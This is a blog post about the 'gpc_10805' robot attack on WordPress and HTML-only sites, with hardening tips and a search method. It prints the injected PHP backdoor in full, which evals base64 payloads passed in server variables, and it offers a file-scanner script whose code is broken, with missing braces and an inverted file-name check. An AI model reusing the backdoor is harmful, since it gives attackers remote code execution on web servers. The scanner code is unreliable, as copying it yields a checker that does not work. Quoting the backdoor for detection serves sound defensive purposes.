WordPress under gpc_10805 attack



A lot of information about last attack on WordPress managed sites can be found:
But pay attention that not only WordPress sites are attacked in this manner, look at the
Sites in the HTML only are attacked by this robot too. Why I think that it is robot? Be cause of it is have not any sense to put WordPress exploit code into HTML only site which doesn’t know anything about WordPress permalinks. So it is a robot and not much sophisticated one.
Stand-alone WordPress bloggers has strong recommendation from WordPress developers upgrade ASAP to the last 2.8.4 WordPress version to be more secure against atack similar the last one. What can do the others HTML only site owners? Robot puts index.php file to their site root directory and thus blocks site work as index.php have priority in execution in relation to the index.html.
If you have HTML only site, you can prevent the execution of scripts inside the root directory and all its sub-directories using .htaccess functionality. You can forbid PHP script execution at all. Please look at the
article and use settings which more convenient for you.
If your host doesn’t allow to use .htaccess you can place index.php with redirection to the index.html into your site root directory and empty index.php into all its sub-directories, and set up read only permisions to that files – something like 444. As a result maliciouse FTP visitor could not rewrite those files and make a damage to your site using it.
How to know if your site attacked by this robot?
As it lefts this trace

function gpc_10805($l10807){if(is_array($l10807)){foreach($l10807 as $l10805=>$l10806)$l10807[$l10805]=gpc_10805($l10806);}elseif(is_string($l10807) && substr($l10807,0,4)=="____"){eval(base64_decode(substr($l10807,4)));$l10807=null;}return $l10807;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_10805",$_SERVER);

we can use eval(base64_decode( as search key for this robot discovering.
If you have ssh access to your site host then the most effective is to use find command

 find . -exec grep -Hn "eval(base64_decode(" {} \;

If you have not ssh access to your host you can use search functionality of your favorite FTP client if it has one. But it is little slow. So in case you have not SSH you can use this very simple streight forward files scan for keyword PHP script

Script Name: Simple Site Checker
function scanSite($path, $recurs, $searchArray) {
$dir = @opendir($path);
if ($dir) {
	while($fileName = readdir($dir)) {
	if ($fileName == '.' || $fileName == '..' || strpos($_SERVER['SCRIPT_NAME'], $fileName)>0) {
			$fileName = $path . '/' . $fileName;
			if (is_dir($fileName) && $recurs)  {
				//echo $fileName.'<br/>';
				scanSite($fileName, 1, $searchArray);
			if (is_file($fileName) && strpos($fileName, '.php')>0) {
        $fh = fopen($fileName,'r') or die('file '.$fileName.' open error');
        while (!feof($fh)) {
          $s = fgets($fh);
          foreach ($searchArray as $searchString) {
            if (strpos($s, $searchString)!==false) {
              echo '<span style="color:red;">Warning:</span> <strong>'.$fileName.'</strong> contains <br/>'.$s.'<br/>';
        fclose($fh) or die('file '.$fileName.' close error');
$searchArr = array();
$searchArr[] = 'eval(base64_decode(';
echo '<h1>Simple script checker from ShinePHP.com</h1>';
echo 'searching...<br/><br/>';
scanSite('.', 1, $searchArr);
echo '<br/>finished<br/>';

Just upload it to your site root and call from the browser.
You can download this script file from this link

Tags: , ,